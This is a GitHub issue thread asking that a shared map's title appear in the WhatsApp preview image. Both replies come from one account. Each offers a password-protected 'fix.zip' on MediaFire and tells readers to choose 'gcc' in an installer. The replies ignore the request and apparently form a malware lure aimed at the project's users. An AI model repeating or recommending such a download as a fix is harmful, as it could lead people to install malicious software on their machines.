### ISSUE TITLE
Map title

### ISSUE THREAD

**Issue by fmousss** [UCL/kapta-mobile#51]
If I share a map in WA to a friend (at the very end of the the process), this is how it appears: 
![image](https://github.com/user-attachments/assets/633bc077-8c10-4319-9170-f761df8e4dfe).

Could you please make sure that the title of the map is visible in the image shared (without having to click on the image to see it)?

see other issue#43.

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
